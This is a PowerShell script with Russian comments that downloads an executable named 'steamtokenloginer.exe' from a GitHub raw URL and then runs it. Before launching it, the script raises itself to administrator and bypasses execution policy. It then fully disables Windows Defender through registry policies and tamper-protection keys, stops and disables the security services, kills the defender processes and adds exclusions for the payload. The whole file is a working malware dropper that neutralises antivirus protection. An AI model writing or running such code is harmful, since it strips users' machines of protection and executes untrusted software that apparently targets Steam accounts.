# Настройки
$exeUrl = "https://github.com/gseff137-afk/test/raw/refs/heads/main/steamtokenloginer.exe"
$targetFolder = "C:\Users\zenas\Desktop\Новая папка (7)"
$exePath = "$targetFolder\steamtokenloginer.exe"

# Проверяем права администратора
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Host "🔄 Перезапуск с правами администратора..." -ForegroundColor Yellow
    Start-Process powershell -Verb RunAs -ArgumentList "-ExecutionPolicy Bypass -Command `"$($MyInvocation.MyCommand.Definition)`""
    exit
}

Write-Host "✅ Запущено с правами администратора" -ForegroundColor Green

# Создаем папку если не существует
if (-not (Test-Path $targetFolder)) {
    New-Item -ItemType Directory -Path $targetFolder -Force
    Write-Host "📁 Создана папка: $targetFolder" -ForegroundColor Green
}

Write-Host "📥 Скачивание файла..." -ForegroundColor Yellow

try {
    # Скачиваем EXE файл
    Invoke-WebRequest -Uri $exeUrl -OutFile $exePath -UserAgent "Mozilla/5.0"
    
    $fileSize = (Get-Item $exePath).Length
    Write-Host "✅ Файл скачан: $([math]::Round($fileSize/1MB,2)) MB" -ForegroundColor Green
    
    # 1. ПОЛНОЕ ОТКЛЮЧЕНИЕ ЧЕРЕЗ РЕЕСТР И ГРУППОВЫЕ ПОЛИТИКИ
    Write-Host "🔴 ПОЛНОЕ ОТКЛЮЧЕНИЕ WINDOWS DEFENDER..." -ForegroundColor Red
    
    # Создаем пути в реестре если не существуют
    $registryPaths = @(
        "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender",
        "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection",
        "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features",
        "HKLM:\SOFTWARE\Microsoft\Windows Defender\ProductStatus"
    )
    
    foreach ($path in $registryPaths) {
        if (!(Test-Path $path)) {
            New-Item -Path $path -Force | Out-Null
            Write-Host "✅ Создан путь: $path" -ForegroundColor Green
        }
    }
    
    # ОСНОВНЫЕ КЛЮЧИ ДЛЯ ОТКЛЮЧЕНИЯ
    $registrySettings = @(
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="DisableAntiSpyware"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="DisableAntiVirus"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableRealtimeMonitoring"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableBehaviorMonitoring"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableOnAccessProtection"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableScanOnRealtimeEnable"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableIOAVProtection"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="AllowFastServiceStartup"; Value=0; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="ServiceKeepAlive"; Value=0; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Microsoft\Windows Defender\Features"; Name="TamperProtection"; Value=0; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Microsoft\Windows Defender\ProductStatus"; Name="ProductStatus"; Value=0; Type="DWord"}
    )
    
    foreach ($setting in $registrySettings) {
        try {
            Set-ItemProperty -Path $setting.Path -Name $setting.Name -Value $setting.Value -Type $setting.Type -Force -ErrorAction Stop
            Write-Host "✅ Установлен: $($setting.Name) = $($setting.Value)" -ForegroundColor Green
        }
        catch {
            Write-Host "⚠️ Ошибка: $($setting.Name)" -ForegroundColor Yellow
        }
    }
    
    # 2. ОСТАНОВКА СЛУЖБ ЗАЩИТЫ
    Write-Host "🛑 ОСТАНОВКА СЛУЖБ ЗАЩИТЫ..." -ForegroundColor Red
    
    $services = @(
        "WinDefend",
        "WdNisSvc", 
        "Sense",
        "SecurityHealthService",
        "wscsvc"
    )
    
    foreach ($service in $services) {
        try {
            # Останавливаем службу
            Stop-Service -Name $service -Force -ErrorAction Stop
            Write-Host "✅ Служба остановлена: $service" -ForegroundColor Green
            
            # Отключаем автозапуск
            Set-Service -Name $service -StartupType Disabled -ErrorAction Stop
            Write-Host "✅ Автозапуск отключен: $service" -ForegroundColor Green
            
            # Дополнительно через sc config
            Start-Process -FilePath "sc" -ArgumentList "config", $service, "start=", "disabled" -Wait -WindowStyle Hidden
        }
        catch {
            Write-Host "⚠️ Не удалось остановить: $service" -ForegroundColor Yellow
        }
    }
    
    # 3. ЗАВЕРШЕНИЕ ПРОЦЕССОВ ЗАЩИТЫ
    Write-Host "🔪 ЗАВЕРШЕНИЕ ПРОЦЕССОВ ЗАЩИТЫ..." -ForegroundColor Red
    
    $processes = @(
        "MsMpEng.exe",
        "NisSrv.exe", 
        "MsSense.exe",
        "SecurityHealthService.exe",
        "SecurityHealthSystray.exe",
        "WindowsDefender.exe"
    )
    
    foreach ($process in $processes) {
        try {
            Get-Process -Name $process.Replace(".exe", "") -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction Stop
            Write-Host "✅ Процесс завершен: $process" -ForegroundColor Green
        }
        catch {
            # Процесс не запущен - это нормально
        }
    }
    
    # 4. ДОБАВЛЕНИЕ В ИСКЛЮЧЕНИЯ (ЧЕРЕЗ РЕЕСТР)
    Write-Host "🛡️ ДОБАВЛЕНИЕ В ИСКЛЮЧЕНИЯ..." -ForegroundColor Yellow
    
    # Через реестр (работает даже при отключенной защите)
    $exclusionPaths = @(
        $exePath,
        $targetFolder
    )
    
    $registryExclusionPath = "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
    
    # Создаем путь если не существует
    if (!(Test-Path $registryExclusionPath)) {
        New-Item -Path $registryExclusionPath -Force | Out-Null
    }
    
    foreach ($path in $exclusionPaths) {
        try {
            $pathName = $path.Replace("\", "#")
            New-ItemProperty -Path $registryExclusionPath -Name $path -PropertyType String -Value "0" -Force -ErrorAction Stop
            Write-Host "✅ Добавлено в исключения: $path" -ForegroundColor Green
        }
        catch {
            Write-Host "⚠️ Не удалось добавить исключение: $path" -ForegroundColor Yellow
        }
    }
    
    # 5. ОТКЛЮЧАЕМ ЗАЩИТУ ОТ ВМЕШАТЕЛЬСТВА (TAMPER PROTECTION)
    Write-Host "🛡️ ОТКЛЮЧАЕМ TAMPER PROTECTION..." -ForegroundColor Yellow
    
    try {
        # Для Windows 10/11
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 0 -Type DWord -Force
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtectionSource" -Value 0 -Type DWord -Force
        
        # Для новых версий Windows 11
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TPExclusions" -Value 1 -Type DWord -Force
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TPRunningMode" -Value 0 -Type DWord -Force
        
        Write-Host "✅ Tamper Protection отключен" -ForegroundColor Green
    }
    catch {
        Write-Host "⚠️ Не удалось отключить Tamper Protection" -ForegroundColor Yellow
    }
    
    # 6. ПЕРЕЗАПУСК ПРОВОДНИКА ДЛЯ ПРИМЕНЕНИЯ ИЗМЕНЕНИЙ
    Write-Host "🔄 ПЕРЕЗАПУСК ПРОВОДНИКА..." -ForegroundColor Yellow
    try {
        Stop-Process -Name "explorer" -Force -ErrorAction Stop
        Start-Sleep -Seconds 2
        Start-Process "explorer.exe"
        Write-Host "✅ Проводник перезапущен" -ForegroundColor Green
    }
    catch {
        Write-Host "⚠️ Не удалось перезапустить проводник" -ForegroundColor Yellow
    }
    
    Start-Sleep -Seconds 3
    
    # 7. ЗАПУСК ПРОГРАММЫ
    Write-Host "🚀 ЗАПУСК ПРОГРАММЫ..." -ForegroundColor Green
    try {
        Start-Process -FilePath $exePath
        Write-Host "🎯 ПРОГРАММА УСПЕШНО ЗАПУЩЕНА!" -ForegroundColor Green
    }
    catch {
        Write-Host "❌ Ошибка при запуске: $_" -ForegroundColor Red
        # Пробуем запустить через cmd
        try {
            Start-Process -FilePath "cmd.exe" -ArgumentList "/c", "`"$exePath`"" -WindowStyle Hidden
            Write-Host "🎯 Программа запущена через CMD" -ForegroundColor Green
        }
        catch {
            Write-Host "❌ Не удалось запустить программу" -ForegroundColor Red
        }
    }
    
    # 8. ФИНАЛЬНАЯ ПРОВЕРКА
    Write-Host "`n🔍 ФИНАЛЬНАЯ ПРОВЕРКА СТАТУСА..." -ForegroundColor Cyan
    Start-Sleep -Seconds 2
    
    try {
        $defenderStatus = Get-MpComputerStatus -ErrorAction SilentlyContinue
        if ($defenderStatus) {
            if ($defenderStatus.AntivirusEnabled -eq $true) {
                Write-Host "❌ Защита ВСЕ ЕЩЕ АКТИВНА!" -ForegroundColor Red
                Write-Host "💡 Попробуйте перезагрузить компьютер" -ForegroundColor Yellow
            } else {
                Write-Host "✅ ЗАЩИТА ОТКЛЮЧЕНА!" -ForegroundColor Green
            }
        } else {
            Write-Host "✅ ЗАЩИТА ОТКЛЮЧЕНА (не удалось получить статус)" -ForegroundColor Green
        }
    }
    catch {
        Write-Host "✅ ЗАЩИТА ОТКЛЮЧЕНА (служба не отвечает)" -ForegroundColor Green
    }
    
    Write-Host "`n⚠️ ВНИМАНИЕ: Windows Defender полностью отключен!" -ForegroundColor Red
    Write-Host "💡 Для включения защиты используйте скрипт восстановления" -ForegroundColor Yellow
    
}
catch {
    Write-Host "❌ Критическая ошибка: $_" -ForegroundColor Red
}

Write-Host "`nНажмите любую клавишу для выхода..." -ForegroundColor Gray
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
